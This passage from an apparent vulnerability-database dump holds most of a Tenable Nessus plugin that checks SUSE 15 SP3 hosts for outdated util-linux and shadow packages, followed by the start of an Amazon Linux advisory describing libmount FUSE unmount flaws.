value:\"p-cpe:/a:novell:suse_linux:libmount1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libmount1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmartcols-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libsmartcols1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libuuid-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libuuid-devel-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libuuid1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libuuid1-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:login_defs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:shadow\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:util-linux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:util-linux-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:util-linux-systemd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:uuidd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item(\"Host/SuSE/release\");\nif (isnull(os_release) || os_release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nvar os_ver = pregmatch(pattern: \"^(SLE(S|D)(?:_SAP)?\\d+)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED15|SLED_SAP15|SLES15|SLES_SAP15)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLED15 / SLED_SAP15 / SLES15 / SLES_SAP15', 'SUSE (' + os_ver + ')');\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE (' + os_ver + ')', cpu);\n\nvar service_pack = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(service_pack)) service_pack = \"0\";\nif (os_ver == \"SLED15\" && (! preg(pattern:\"^(3)$\", string:service_pack))) audit(AUDIT_OS_NOT, \"SLED15 SP3\", os_ver + \" SP\" + service_pack);\nif (os_ver == \"SLED_SAP15\" && (! preg(pattern:\"^(3)$\", string:service_pack))) audit(AUDIT_OS_NOT, \"SLED_SAP15 SP3\", os_ver + \" SP\" + service_pack);\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(3)$\", string:service_pack))) audit(AUDIT_OS_NOT, \"SLES15 SP3\", os_ver + \" SP\" + service_pack);\nif (os_ver == \"SLES_SAP15\" && (! preg(pattern:\"^(3)$\", string:service_pack))) audit(AUDIT_OS_NOT, \"SLES_SAP15 SP3\", os_ver + \" SP\" + service_pack);\n\nvar pkgs = [\n {'reference':'libblkid-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libblkid-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libblkid-devel-static-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libblkid-devel-static-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libblkid1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libblkid1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libblkid1-32bit-2.36.2-150300.4.14.3', 'sp':'3', 'cpu':'x86_64', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libblkid1-32bit-2.36.2-150300.4.14.3', 'sp':'3', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libeconf0-0.4.4+git20220104.962774f-150300.3.6.2', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libeconf0-0.4.4+git20220104.962774f-150300.3.6.2', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libfdisk-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libfdisk-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libfdisk1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libfdisk1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libmount-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libmount-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libmount1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libmount1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libmount1-32bit-2.36.2-150300.4.14.3', 'sp':'3', 'cpu':'x86_64', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libmount1-32bit-2.36.2-150300.4.14.3', 'sp':'3', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libsmartcols-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libsmartcols-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libsmartcols1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libsmartcols1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libuuid-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libuuid-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libuuid-devel-static-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libuuid-devel-static-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libuuid1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libuuid1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libuuid1-32bit-2.36.2-150300.4.14.3', 'sp':'3', 'cpu':'x86_64', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libuuid1-32bit-2.36.2-150300.4.14.3', 'sp':'3', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'login_defs-4.8.1-150300.4.3.8', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'login_defs-4.8.1-150300.4.3.8', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'shadow-4.8.1-150300.4.3.8', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'shadow-4.8.1-150300.4.3.8', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'util-linux-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'util-linux-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'util-linux-lang-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'util-linux-lang-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'util-linux-systemd-2.36.2-150300.4.14.2', 'sp':'3', 'release':'SLED_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'util-linux-systemd-2.36.2-150300.4.14.2', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'uuidd-2.36.2-150300.4.14.2', 'sp':'3', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.3']},\n {'reference':'libblkid-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libblkid-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libblkid-devel-static-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libblkid-devel-static-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libblkid1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libblkid1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libblkid1-32bit-2.36.2-150300.4.14.3', 'sp':'3', 'cpu':'x86_64', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libblkid1-32bit-2.36.2-150300.4.14.3', 'sp':'3', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libeconf0-0.4.4+git20220104.962774f-150300.3.6.2', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libeconf0-0.4.4+git20220104.962774f-150300.3.6.2', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sle-module-transactional-server-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libfdisk-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libfdisk-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libfdisk1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libfdisk1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libmount-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libmount-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libmount1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libmount1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libmount1-32bit-2.36.2-150300.4.14.3', 'sp':'3', 'cpu':'x86_64', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libmount1-32bit-2.36.2-150300.4.14.3', 'sp':'3', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libsmartcols-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libsmartcols-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libsmartcols1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libsmartcols1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libuuid-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libuuid-devel-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libuuid-devel-static-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libuuid-devel-static-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libuuid1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libuuid1-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libuuid1-32bit-2.36.2-150300.4.14.3', 'sp':'3', 'cpu':'x86_64', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'libuuid1-32bit-2.36.2-150300.4.14.3', 'sp':'3', 'cpu':'x86_64', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'login_defs-4.8.1-150300.4.3.8', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'login_defs-4.8.1-150300.4.3.8', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'shadow-4.8.1-150300.4.3.8', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'shadow-4.8.1-150300.4.3.8', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'util-linux-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'util-linux-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'util-linux-lang-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'util-linux-lang-2.36.2-150300.4.14.3', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'util-linux-systemd-2.36.2-150300.4.14.2', 'sp':'3', 'release':'SLED15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'util-linux-systemd-2.36.2-150300.4.14.2', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-basesystem-release-15.3', 'sled-release-15.3', 'sles-release-15.3']},\n {'reference':'uuidd-2.36.2-150300.4.14.2', 'sp':'3', 'release':'SLES15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLE_HPC-release-15.3', 'SUSE-Manager-Proxy-release-4.2', 'SUSE-Manager-Server-release-4.2', 'sle-module-server-applications-release-15.3', 'sles-release-15.3']}\n];\n\nvar ltss_caveat_required = FALSE;\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var exists_check = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && _release) {\n if (exists_check) {\n var check_flag = 0;\n foreach var check (exists_check) {\n if (!rpm_exists(release:_release, rpm:check)) continue;\n check_flag++;\n }\n if (!check_flag) continue;\n }\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'libblkid-devel / libblkid-devel-static / libblkid1 / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-15T15:06:40", "description": "It is, therefore, affected by multiple vulnerabilities as referenced in the ALAS2022-2022-086 advisory.\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows an unprivileged local attacker to unmount FUSE filesystems that belong to certain other users who have a UID that is a prefix of the UID of the attacker in its string form. An attacker may use this flaw to cause a denial of service to applications that use the affected filesystems. (CVE-2021-3995)\n\n - A logic error was found in the libmount library of util-linux in the function that allows an unprivileged user to unmount a FUSE filesystem. This flaw allows a local user on a vulnerable system to unmount other users' filesystems that are either world-writable themselves (like /tmp) or mounted in a world-writable directory. An attacker may use this flaw to 